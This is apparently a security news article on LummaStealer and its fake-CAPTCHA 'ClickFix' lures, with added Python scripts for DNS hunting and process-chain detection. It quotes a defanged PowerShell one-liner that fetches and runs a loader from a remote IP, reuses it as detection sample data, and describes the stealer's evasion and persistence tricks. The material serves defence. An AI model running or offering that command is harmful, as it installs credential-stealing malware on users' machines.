Fake CAPTCHA Attacks Fuel LummaStealer Malware Surge
This information-stealing malware, first seen on Russian forums in late 2022, operates under a malware-as-a-service (MaaS) model, letting affiliates subscribe for $250 to $20,000 for features like custom loaders and C2 panels.
It targets Windows systems, grabbing browser credentials, cookies, crypto wallets, 2FA tokens, Discord/Steam data, screenshots, and clipboard info.
Operators rebuilt fast after Microsoft’s May 2025 action seized 2,300+ C2 domains, migrating to bulletproof hosts and swapping loaders like Rugmi or DonutLoader for CastleLoader.
Telemetry from December 2025 to January 2026 shows a global spread, peaking in India, the US, and Europe.
Social engineering drives most infections; no zero-days are needed. Victims run files posing as cracked software such as “autocad 2008 keygen,” games such as “Dark Souls full.exe,” or movie torrents such as “avatar fire and ash 2025.mp4.exe.”
These often use self-extracting archives or NSIS installers that chain to CastleLoader via cmd.exe and extrac32 on .cab files.
Fake CAPTCHA “ClickFix” pages are surging: sites mimic Cloudflare checks, overwrite the clipboard with encoded PowerShell such as “&(gal wg*) -useb hxxp://45.221.64.224/12.d|iex,” and urge the victim to press Win+R, paste, and run it.
This fetches the loader directly, bypassing a file download; legitimate platforms like Steam, Discord, or itch.io are used to host the bait, lending it credibility.
CastleLoader, tied to the threat group GrayBravo, uses AutoIt (or Python) scripts compiled into exes for evasion.
Obfuscation includes dictionary variables (e.g., $COMMONLYOMAN), hex string decodes with XOR keys, and junk ops like pointless math.
Sandbox evasion: checks COMPUTERNAME=“tz” or USERNAME=“test22”, pings fake domains like “sfcphDaHojOHzEbBXPMIuBTaOH.sfcphDaHojOHzEbBXPMIuBTaOH” (a repeated-string pattern that can be hunted for in DNS logs), scans for vmtoolsd.exe/VboxTray.exe/SandboxieRpcSs.exe, or sleeps when avastui.exe is present.
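The repeated-string lookup above is a useful hunting signal in its own right: real hostnames almost never consist of the same long label written twice. The following is an added example, not code from the article or from Bitdefender, that scans DNS query names for adjacent identical labels. The sample query list is constructed here; only the first name is the one quoted in the article, and the 12-character minimum is an assumed threshold to keep short legitimate names such as “xyz.xyz” out of the results.

```python
"""Flag DNS query names built from one long label repeated (e.g. "X.X")."""
from typing import List, Optional, Tuple

# Constructed sample of query names. Only the first one is taken from the
# article; the rest are invented here for contrast.
SAMPLE_QUERIES: List[str] = [
    "sfcphDaHojOHzEbBXPMIuBTaOH.sfcphDaHojOHzEbBXPMIuBTaOH",  # from the article
    "www.example.com",
    "abcdefgHIJKLmn.abcdefgHIJKLmn",      # constructed: same shape, different string
    "mail.google.com",
    "xyz.xyz",                            # constructed: repeated but short, should not fire
]

# Assumed threshold: labels shorter than this repeat legitimately (e.g. "xyz.xyz").
MIN_LABEL_LEN = 12


def repeated_label_reason(qname: str, min_len: int = MIN_LABEL_LEN) -> Optional[str]:
    """Return a human-readable reason if qname has two adjacent identical
    labels of at least min_len characters, otherwise None.

    DNS is case-insensitive, so labels are compared lower-cased; a trailing
    dot (fully qualified form) is tolerated.
    """
    labels = [lbl for lbl in qname.strip().rstrip(".").split(".") if lbl]
    if len(labels) < 2:
        return None
    for left, right in zip(labels, labels[1:]):
        if left.lower() == right.lower() and len(left) >= min_len:
            return f"adjacent identical labels of length {len(left)}"
    return None


def scan_queries(queries: List[str]) -> List[Tuple[str, str]]:
    """Return (qname, reason) for every query that matches the pattern."""
    hits: List[Tuple[str, str]] = []
    for qname in queries:
        reason = repeated_label_reason(qname)
        if reason is not None:
            hits.append((qname, reason))
    return hits


if __name__ == "__main__":
    for qname, reason in scan_queries(SAMPLE_QUERIES):
        print(f"SUSPICIOUS {qname}: {reason}")
```

In a real environment such a name should return NXDOMAIN; a query for it that does resolve points at a resolver that answers everything, which is exactly what the malware is probing for. Either way, the query itself is worth an alert, since nothing legitimate on a workstation asks for names of this shape.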
Persistence adapts: drops to %LocalAppData%CraftStitch Studios IncV.a3x or AutoIt3.exe if Avast/Bitdefender/Sophos run, creates StitchCraftX.lnk shortcuts, and Startup .url files via DllCall CreateProcessW or direct write.
Payloads decrypt via dual XOR shellcodes, LZNT1 decompress, then inject MZ/PE like Lumma. Infra overlap with Lumma suggests shared providers.
VBA layers add scheduled tasks: wscript.exe runs a JS script that sets schtasks /sc minute for repeating.
Lumma exfils via C2: emails (Gmail/Outlook), VPN .ovpn, FTP, AnyDesk, KeePass, MetaMask/Binance wallets, plus system specs for profiling.
Impacts: account hijacks (bypass via cookies), crypto theft, ID fraud from .pdf/.docx docs, extortion via adult lures or “surveillance” claims.
Key IoCs from analysis:
According to Bitdefender, avoid pirated/cracked files, torrent “movies,” and manual cmds; verify the CAPTCHA doesn’t ask for Run/PowerShell.
If hit, rotate credentials (email and finance accounts first), revoke all active sessions, and reinstall the OS. Orgs: train staff on ClickFix, enforce MFA, and watch LOLBins (extrac32/cmd) plus anomalous DNS and process activity via EDR. Behavioral rules beat signatures as MaaS evolves.
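The three process chains the article describes (the Win+R ClickFix PowerShell one-liner, cmd.exe driving extrac32 over a .cab, and wscript.exe registering a per-minute schtasks entry) can all be expressed as parent/child/command-line rules over EDR process-creation events. The following is an added example, not code from the article, Bitdefender, or any EDR vendor, that runs such rules over a constructed set of Sysmon-style events. The command lines are modelled on the article's descriptions; the URL is kept defanged (“hxxp”) exactly as it appears on the page, and the file paths, task name and rule names are invented here.

```python
"""Behavioral detection rules for the loader chains described in the article."""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed process-creation events (simplified Sysmon Event ID 1 fields).
# Paths, task name and the notepad/installer events are invented; the
# PowerShell one-liner and the IP are as quoted in the article (URL defanged).
SAMPLE_EVENTS: List[Event] = [
    {"ParentImage": r"C:\Windows\explorer.exe",   # Win+R launches via explorer.exe
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell "&(gal wg*) -useb hxxp://45.221.64.224/12.d|iex"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\extrac32.exe",
     "CommandLine": r"extrac32 /Y C:\Users\Public\setup.cab C:\Users\Public\out"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /create /sc minute /mo 5 /tn Updater /tr C:\Users\Public\run.js"},
    {"ParentImage": r"C:\Windows\explorer.exe",     # benign: user opens notepad
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"ParentImage": r"C:\Program Files\Vendor\installer.exe",  # benign-looking: not the cmd chain
     "Image": r"C:\Windows\System32\extrac32.exe",
     "CommandLine": r"extrac32 /Y package.cab"},
]


def _base(image: str) -> str:
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


# Tokens typical of the pasted one-liner: iex / Invoke-Expression, the -useb
# switch, and "gal wg*" (Get-Alias resolving the wget alias to Invoke-WebRequest).
CLICKFIX_RE = re.compile(r"(?i)(\biex\b|invoke-expression|-useb\b|\bgal\s+\w*\*)")


def rule_clickfix(ev: Event) -> bool:
    """Shell spawned from explorer.exe (Run dialog) with download-and-execute tokens."""
    return (_base(ev["ParentImage"]) == "explorer.exe"
            and _base(ev["Image"]) in {"powershell.exe", "pwsh.exe", "cmd.exe"}
            and CLICKFIX_RE.search(ev["CommandLine"]) is not None)


def rule_extrac32_chain(ev: Event) -> bool:
    """cmd.exe using extrac32 to unpack a .cab, as in the installer-to-loader chain."""
    return (_base(ev["ParentImage"]) == "cmd.exe"
            and _base(ev["Image"]) == "extrac32.exe"
            and ".cab" in ev["CommandLine"].lower())


def rule_minute_schtask(ev: Event) -> bool:
    """Script host creating a task that repeats every minute."""
    return (_base(ev["ParentImage"]) in {"wscript.exe", "cscript.exe"}
            and _base(ev["Image"]) == "schtasks.exe"
            and re.search(r"(?i)/sc\s+minute", ev["CommandLine"]) is not None)


RULES: Dict[str, Callable[[Event], bool]] = {
    "clickfix_run_dialog": rule_clickfix,
    "cmd_extrac32_cab": rule_extrac32_chain,
    "script_host_minute_task": rule_minute_schtask,
}


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    hits: List[Tuple[int, str]] = []
    for idx, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((idx, name))
    return hits


if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name} -> {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The parent-process condition does most of the work: PowerShell and extrac32 are common on a healthy host, but PowerShell launched from the Run dialog with `iex` in its arguments, or extrac32 chained from cmd.exe, is rare enough to review every time, which is the point the article makes about behavioral rules outlasting signatures.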
Lumma’s resilience shows that MaaS ecosystems thrive on abusing user trust; stay vigilant.
The post Fake CAPTCHA Attacks Fuel LummaStealer Malware Surge appeared first on Cyber Security News.